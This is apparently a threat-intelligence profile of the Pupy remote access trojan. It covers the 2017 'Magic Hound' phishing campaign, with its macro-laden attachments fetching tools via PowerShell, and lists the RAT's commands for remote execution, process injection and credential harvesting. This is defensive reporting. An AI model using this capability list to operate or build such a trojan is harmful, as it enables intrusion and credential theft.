Pupy

Pupy is an open-source multi-platform remote access trojan (RAT) utilized by advanced persistent threat (APT) groups. It was used in an early 2017 campaign, dubbed "Magic Hound," that targeted Saudi Arabian organizations associated with the financial, oil, and technology sectors. In this campaign, the actors used phishing emails containing attached documentsembedded with malicious macros. Once enabled, these macros call Windows PowerShell to retrieve additional tools. The attachments in the phishing emails masqueraded as communications from the Saudi government as well as holiday greeting cards. Reports about the campaign indicate the attackers are likely the Iranian-government backed APT group, "Rocket Kitten." Pupy has several capabilities that can be initiated by using the following commands:

  • connect - Connect On A Client Using A Bind Payload
  • exit - Quit Pupy Shell
  • jobs - Manage Jobs
  • list_modules - List Available Modules With A Brief Description (The First Description Line)
  • python - Start The Local Python Interpreter (For Debugging Purposes)
  • read - Execute A List Of Commands From A File
  • run - Run A Module On One Or Multiple Clients
  • sessions - List/Interact With Established Sessions
  • info - Get Some Informations About One Or Multiple Clients
  • ps - List Processes
  • shell - Open An Interactive Command Shell With A Nice Tty
  • getuid - Get Username
  • exec - Execute Shell Commands On A Remote System
  • migrate - Migrate Pupy Into Another Process Using Reflective Dll Injection
  • pyexec - Execute Python Code On A Remote System
  • mount - List Valid Drives In The System
  • mv - Move File Or Directory
  • mkdir - Create An Empty Directory
  • kill - Kill A Process
  • cd - Change Directory
  • getppid - List Parent Process Information
  • pwd - Print Working Directory
  • cat - Show Contents Of A File
  • exit - Exit The Client On The Other Side
  • ls - List System Files
  • rm - Remove A File Or A Directory
  • cp - Copy File Or Directory
  • creds - Database Containing All Passwords Found
  • getpid - List Process Information

Technical Details

  • Palo Alto Networks provides technical analysis on the Pupy RAT, available here.
  • SecureWorks provides technical analysis on the Pupy RAT, available here.